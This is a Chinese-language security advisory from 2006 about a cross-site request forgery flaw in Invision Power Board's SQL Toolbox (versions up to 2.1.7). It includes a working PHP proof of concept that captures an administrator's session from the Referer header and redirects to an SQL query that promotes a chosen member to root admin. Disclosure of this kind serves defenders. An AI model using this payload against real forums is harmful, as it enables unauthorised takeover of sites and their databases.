2006-10-9 10:05:58
发布日期:2006-10-04
更新日期:2006-10-09
受影响系统:
Invision PS IPB <= 2.1.7
描述:
Invision Power Board是一个非常流行的PHP论坛程序。
IPB的Toolbox在处理请求时存在漏洞,远程攻击者可能利用此漏洞非授权访问数据库。
如果管理员能够访问Invision Power Board的SQL Toolbox,且在浏览器中浏览了恶意图形,就可能被重新定向通过SQL Toolbox强制执行SQL命令。这种攻击很难被发现,因为仅有图形而不是页面被重新定向。
<*来源:Rapigator (rapigator@yahoo.com)
链接:http://secunia.com/advisories/19830/print/
*>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
<?php
//The member id to promote to root admin
$mid = 145;
//The database prefix (usually "ibf_")
$prefix = "ibf_";
if (preg_match('/(.*adsess=[\\w]{32})/',
$_SERVER['HTTP_REFERER'], $admin_loc) and $mid)
{
header("Location:
".$admin_loc[1]."&act=sql&code=runsql&query=UPDATE+{$prefix}members+SET+mgroup%3D4+whe \
re+id%3D{$mid}+LIMIT+1"); }
?>
建议:
厂商补丁:
Invision PS
-----------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
http://www.invisionpower.com/
|
网友评论:(只显示最新10条。评论内容只代表网友观点,与本站立场无关!)